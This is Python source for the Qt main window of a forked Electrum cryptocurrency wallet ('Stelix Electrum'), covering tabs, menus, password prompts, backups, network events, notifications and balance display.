self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon) self.setAutoRaise(True) self.setMaximumWidth(25) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) self.setCursor(QCursor(Qt.PointingHandCursor)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]: self.func() def protected(func): '''Password request wrapper. The password is passed to the function as the 'password' named argument. "None" indicates either an unencrypted wallet, or the user cancelled the password request. 
An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_keystore_encryption(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() network_signal = pyqtSignal(str, object) #ln_payment_attempt_signal = pyqtSignal(str) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() show_error_signal = pyqtSignal(str) payment_request: Optional[paymentrequest.PaymentRequest] def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet): QMainWindow.__init__(self) self.gui_object = gui_object self.config = config = gui_object.config # type: SimpleConfig self.gui_thread = gui_object.gui_thread assert wallet, "no wallet" self.wallet = wallet if wallet.has_lightning(): self.wallet.config.set_key('show_channels_tab', True) self.setup_exception_hook() self.network = gui_object.daemon.network # type: Network self.fx = gui_object.daemon.fx # type: FxThread self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self._cleaned_up = False self.payment_request = None # type: Optional[paymentrequest.PaymentRequest] self.payto_URI = None self.checking_accounts = False self.qr_window = None self.pluginsdialog = None self.showing_cert_mismatch_error = False self.tl_windows = [] self.pending_invoice = None Logger.__init__(self) self.tx_notification_queue = queue.Queue() self.tx_notification_last_time = 0 self.create_status_bar() self.need_update = threading.Event() self.completions = QStringListModel() coincontrol_sb = self.create_coincontrol_statusbar() self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() self.channels_tab = self.create_channels_tab() self.tokens_tab = self.create_tokens_tab() self.smart_contract_tab = self.create_smart_contract_tab() self.delegations_tab = self.create_delegations_tab() tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History')) tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive')) tabs.addTab(self.tokens_tab, read_QIcon("tab_contacts.png"), _('Tokens')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses") if self.wallet.has_lightning(): add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels") add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts") 
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console") add_optional_tab(tabs, self.smart_contract_tab, read_QIcon("tab_console.png"), _('Smart Contract'), 'contract') add_optional_tab(tabs, self.delegations_tab, read_QIcon("tab_console.png"), _('Delegations'), 'delegations') tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) central_widget = QWidget() vbox = QVBoxLayout(central_widget) vbox.setContentsMargins(0, 0, 0, 0) vbox.addWidget(tabs) vbox.addWidget(coincontrol_sb) self.setCentralWidget(central_widget) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(read_QIcon("electrum.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("F5"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) self.show_error_signal.connect(self.show_error) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'new_transaction', 'status', 'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes', 'on_history', 'channel', 'channels_updated', 'payment_failed', 'payment_succeeded', 'on_token', 'on_delegation', 'invoice_status', 'request_status', 'ln_gossip_sync_progress', 'cert_mismatch', 'gossip_db_loaded'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... util.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) # update fee slider in case we missed the callback #self.fee_slider.update() self.load_wallet(wallet) gui_object.timer.timeout.connect(self.timer_actions) self.fetch_alias() # If the option hasn't been set yet if config.get('check_updates') is None: choice = self.question(title="Stelix Electrum - " + _("Enable update check"), msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " + _("Would you like to be notified when there is a newer version of Electrum available?")) config.set_key('check_updates', bool(choice), save=True) self._update_check_thread = None if config.get('check_updates', False): # The references to both the thread and the window need to be stored somewhere # to prevent GC from getting in our way. 
def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to Stelix Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread() self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def setup_exception_hook(self): Exception_Hook.maybe_setup(config=self.config, wallet=self.wallet) def run_coroutine_from_thread(self, coro, on_result=None): def task(): try: f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) r = f.result() if on_result: on_result(r) except Exception as e: self.logger.exception("exception in coro scheduled via window.wallet") self.show_error_signal.emit(str(e)) self.wallet.thread.add(task) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_fx_token(self): self.token_hist_model.refresh('fx_token') self.token_hist_list.update() self.token_balance_list.update() def on_fx_delegation(self): self.delegation_list.update() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: # TODO would be nice if we just sent these to the crash reporter... 
# anything we don't want to send there, we should explicitly catch # send_exception_to_crash_reporter(e) try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(repr(e)) def on_network(self, event, *args): # Handle in GUI thread self.network_signal.emit(event, args) def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread # note: all windows get events from all wallets! if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event == 'on_quotes': self.on_fx_quotes() elif event == 'on_history': self.on_fx_history() elif event == 'on_token': self.on_fx_token() elif event == 'on_delegation': self.on_fx_delegation() elif event == 'gossip_db_loaded': self.channels_list.gossip_db_loaded.emit(*args) elif event == 'channels_updated': wallet = args[0] if wallet == self.wallet: self.channels_list.update_rows.emit(*args) elif event == 'channel': wallet = args[0] if wallet == self.wallet: self.channels_list.update_single_row.emit(*args) self.update_status() elif event == 'request_status': self.on_request_status(*args) elif event == 'invoice_status': self.on_invoice_status(*args) elif event == 'payment_succeeded': wallet = args[0] if wallet == self.wallet: self.on_payment_succeeded(*args) elif event == 'payment_failed': wallet = args[0] if wallet == self.wallet: self.on_payment_failed(*args) elif event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': pass elif event == 'fee_histogram': self.history_model.on_fee_histogram() elif event == 'ln_gossip_sync_progress': self.update_lightning_icon() elif event == 'cert_mismatch': self.show_cert_mismatch_error() else: self.logger.info(f"unexpected network event: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet: Abstract_Wallet): wallet.thread = TaskThread(self, self.on_error) self.update_recently_visited(wallet.storage.path) if wallet.has_lightning(): util.trigger_callback('channels_updated', wallet) self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.channels_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() 
run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.db.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Stelix Electrum Testnet" if constants.net.TESTNET else "Stelix Electrum" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.db.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend SLXs with it."), _("Make sure you own the seed phrase or the private keys, before you request SLXs to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main Stelix network. 
It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def select_backup_dir(self, b): name = self.config.get('backup_dir', '') dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name) if dirname: self.config.set_key('backup_dir', dirname) self.backup_dir_e.setText(dirname) def backup_wallet(self): d = WindowModalDialog(self, _("File Backup")) vbox = QVBoxLayout(d) grid = QGridLayout() backup_help = "" backup_dir = self.config.get('backup_dir') backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help) msg = _('Please select a backup directory') if self.wallet.has_lightning() and self.wallet.lnworker.channels: msg += '\n\n' + ' '.join([ _("Note that lightning channels will be converted to channel backups."), _("You cannot use channel backups to perform lightning payments."), _("Channel backups can only be used to request your channels to be closed.") ]) self.backup_dir_e = QPushButton(backup_dir) self.backup_dir_e.clicked.connect(self.select_backup_dir) grid.addWidget(backup_dir_label, 1, 0) grid.addWidget(self.backup_dir_e, 1, 1) vbox.addLayout(grid) vbox.addWidget(WWLabel(msg)) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return try: new_path = self.wallet.save_backup() except BaseException as reason: self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) return if new_path: msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path) self.show_message(msg, title=_("Wallet backup created")) else: self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.wallet.storage.path)) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), 
self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_wallet_info) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.export_invoices()) requests_menu = wallet_menu.addMenu(_("Requests")) requests_menu.addAction(_("Import"), lambda: self.import_requests()) requests_menu.addAction(_("Export"), lambda: self.export_requests()) try: addr_type, __ = b58_address_to_hash160(self.addresses[0]) except: addr_type = constants.net.SEGWIT_HRP if not isinstance(self.wallet.keystore, TrezorKeyStore) and addr_type == constants.net.ADDRTYPE_P2PKH and not self.wallet.is_watching_only(): token_menu = wallet_menu.addMenu(_("&Token")) token_menu.addAction(_("Add Token"), lambda: self.token_add_dialog()) smart_cotract_menu = wallet_menu.addMenu(_("&Smart Contract")) smart_cotract_menu.addAction(_("Add Contract"), lambda: self.contract_add_dialog()) smart_cotract_menu.addAction(_("Create Contract"), lambda: self.contract_create_dialog()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) if self.wallet.has_lightning(): add_toggle_action(view_menu, self.channels_tab) add_toggle_action(view_menu, 
self.contacts_tab) add_toggle_action(view_menu, self.console_tab) add_toggle_action(view_menu, self.smart_contract_tab) add_toggle_action(view_menu, self.delegations_tab) tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction if sys.platform == 'darwin': # "Settings"/"Preferences" are all reserved keywords in macOS. # preferences_action will get picked up based on name (and put into a standardized location, # and given a standard reserved hotkey) # Hence, this menu item will be at a "uniform location re macOS processes" preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences # Add another preferences item, to also have a "uniform location for Electrum between different OSes" tools_menu.addAction(_("Electrum preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network)) tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network)) tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower)) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign POD"), self.sign_pod) tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webopen("https://github.com/alayo05/stelix-electrum")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters().server.host self.pay_to_URI('stelix:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Qtum Electrum", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("This software is based on Electrum to support Qtum.") + " " + _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most 
                              complicated parts of the Bitcoin system.") + "\n\n" +
              _("Uses icons from the Icons8 icon pack (icons8.com).")))

    def show_update_check(self, version=None):
        self.gui_object._update_check = UpdateCheck(latest_version=version)

    def show_report_bug(self):
        msg = ' '.join([
            _("Please report any bugs as issues on github:<br/>"),
            f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
            _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
            _("Try to explain not only what the bug is, but how it occurs.")
        ])
        self.show_message(msg, title="Qtum Electrum - " + _("Reporting Bugs"), rich_text=True)

    def notify_transactions(self):
        if self.tx_notification_queue.qsize() == 0:
            return
        if not self.wallet.up_to_date:
            return  # no notifications while syncing
        now = time.time()
        rate_limit = 20  # seconds
        if self.tx_notification_last_time + rate_limit > now:
            return
        self.tx_notification_last_time = now
        self.logger.info("Notifying GUI about new transactions")
        txns = []
        while True:
            try:
                txns.append(self.tx_notification_queue.get_nowait())
            except queue.Empty:
                break
        # Combine the transactions if there are at least three
        if len(txns) >= 3:
            total_amount = 0
            for tx in txns:
                tx_wallet_delta = self.wallet.get_wallet_delta(tx)
                if not tx_wallet_delta.is_relevant:
                    continue
                total_amount += tx_wallet_delta.delta
            self.notify(_("{} new transactions: Total amount received in the new transactions {}")
                        .format(len(txns), self.format_amount_and_units(total_amount)))
        else:
            for tx in txns:
                tx_wallet_delta = self.wallet.get_wallet_delta(tx)
                if not tx_wallet_delta.is_relevant:
                    continue
                self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))

    def notify(self, message):
        if self.tray:
            try:
                # this requires Qt 5.9
                self.tray.showMessage("Qtum Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
            except TypeError:
                self.tray.showMessage("Qtum Electrum", message, QSystemTrayIcon.Information, 20000)

    def timer_actions(self):
        self.request_list.refresh_status()
        # Note this runs in the GUI thread
        if self.need_update.is_set():
            self.need_update.clear()
            self.update_wallet()
        elif not self.wallet.up_to_date:
            # this updates "synchronizing" progress
            self.update_status()
        # resolve aliases
        # FIXME this is a blocking network call that has a timeout of 5 sec
        self.payto_e.resolve()
        self.notify_transactions()

    def format_amount(self, x, is_diff=False, whitespaces=False, num_zeros=None, decimal_point=None):
        # x is in sats
        return self.config.format_amount(x, is_diff, whitespaces, num_zeros, decimal_point)

    def format_amount_and_units(self, amount):
        # amount is in sats
        text = self.config.format_amount_and_units(amount)
        x = self.fx.format_amount_and_units(amount) if self.fx else None
        if text and x:
            text += ' (%s)' % x
        return text

    def format_fee_rate(self, fee_rate):
        return self.config.format_fee_rate(fee_rate)

    def get_decimal_point(self):
        return self.config.get_decimal_point()

    def base_unit(self):
        return self.config.get_base_unit()
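    # --- Illustrative sketch (not part of the original file) -------------------
    # connect_fields() below keeps a coin-amount edit and a fiat-amount edit in
    # sync.  The arithmetic it applies is simply
    #     sats = fiat / rate * COIN        and        fiat = sats * rate / COIN
    # where `rate` is the fiat price of one whole coin and COIN is the number of
    # base units (satoshis) per coin, as already imported and used elsewhere in
    # this file.  The two helpers here are hypothetical, hedged examples of that
    # math and are not referenced anywhere else; e.g. 25.00 fiat at a rate of
    # 50000 per coin gives 25 / 50000 * COIN = 50000 sats.
    @staticmethod
    def _example_fiat_to_sat(fiat_amount: Decimal, rate: Decimal) -> int:
        """Convert a fiat amount to satoshis at the given per-coin rate (sketch)."""
        return int(fiat_amount / rate * COIN)

    @staticmethod
    def _example_sat_to_fiat(amount_sat: int, rate: Decimal) -> Decimal:
        """Convert satoshis back to a fiat amount at the given per-coin rate (sketch)."""
        return Decimal(amount_sat) * rate / COIN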
    def connect_fields(self, window, btc_e, fiat_e, fee_e):

        def edit_changed(edit):
            if edit.follows:
                return
            edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
            fiat_e.is_last_edited = (edit == fiat_e)
            amount = edit.get_amount()
            rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
            if rate.is_nan() or amount is None:
                if edit is fiat_e:
                    btc_e.setText("")
                    if fee_e:
                        fee_e.setText("")
                else:
                    fiat_e.setText("")
            else:
                if edit is fiat_e:
                    btc_e.follows = True
                    btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                    btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    btc_e.follows = False
                    if fee_e:
                        window.update_fee()
                else:
                    fiat_e.follows = True
                    fiat_e.setText(self.fx.ccy_amount_str(
                        amount * Decimal(rate) / COIN, False))
                    fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    fiat_e.follows = False

        btc_e.follows = False
        fiat_e.follows = False
        fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
        btc_e.textChanged.connect(partial(edit_changed, btc_e))
        fiat_e.is_last_edited = False

    def update_status(self):
        if not self.wallet:
            return
        if self.network is None:
            text = _("Offline")
            icon = read_QIcon("status_disconnected.png")
        elif self.network.is_connected():
            server_height = self.network.get_server_height()
            server_lag = self.network.get_local_height() - server_height
            fork_str = "_fork" if len(self.network.get_blockchains()) > 1 else ""
            # Server height can be 0 after switching to a new server
            # until we get a headers subscription request response.
            # Display the synchronizing message in that case.
            if not self.wallet.up_to_date or server_height == 0:
                num_sent, num_answered = self.wallet.get_history_sync_state_details()
                text = ("{} ({}/{})"
                        .format(_("Synchronizing..."), num_answered, num_sent))
                icon = read_QIcon("status_waiting.png")
            elif server_lag > 1:
                text = _("Server is lagging ({} blocks)").format(server_lag)
                icon = read_QIcon("status_lagging%s.png" % fork_str)
            elif server_lag < (-1):
                text = _("Synchronizing headers...")
                icon = read_QIcon("status_waiting.png")
            else:
                c, u, x = self.wallet.get_balance()
                text = _("Balance") + ": %s " % (self.format_amount_and_units(c))
                if u:
                    text += " [%s unconfirmed]" % (self.format_amount(u, is_diff=True).strip())
                if x:
                    text += " [%s unmatured]" % (self.format_amount(x, is_diff=True).strip())
                if self.wallet.has_lightning():
                    l = self.wallet.lnworker.get_balance()
                    text += u' \U000026a1 %s' % (self.format_amount_and_units(l).strip())
                # append fiat balance and price
                if self.fx.is_enabled():
                    text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or ''
                if not self.network.proxy:
                    icon = read_QIcon("status_connected%s.png" % fork_str)
                else:
                    icon = read_QIcon("status_connected_proxy%s.png" % fork_str)
        else:
            icon = read_QIcon("status_disconnected.png")
            if self.network.proxy:
                text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
            elif self.network.downloading_headers:
                text = _("Downloading headers...")
                icon = read_QIcon("status_waiting.png")
            else:
                text = _("Not connected")

        if self.tray:
            self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
        self.balance_label.setText(text)
        if self.status_button:
            self.status_button.setIcon(icon)

    def update_wallet(self):
        self.update_status()
        if self.wallet.up_to_date or not self.network or not self.network.is_connected():
            self.update_tabs()

    def update_tabs(self, wallet=None):
        if wallet is None:
            wallet = self.wallet
        if wallet != self.wallet:
            return
        self.history_model.refresh('update_tabs')
        self.request_list.update()
        self.address_list.update()
        self.utxo_list.update()
        self.contact_list.update()
        self.invoice_list.update()
        self.token_balance_list.update()
        self.token_hist_model.refresh('update_tabs')
        self.token_hist_list.update()
        self.smart_contract_list.update()
        self.delegation_list.update()
        self.channels_list.update_rows.emit(wallet)
        self.update_completions()

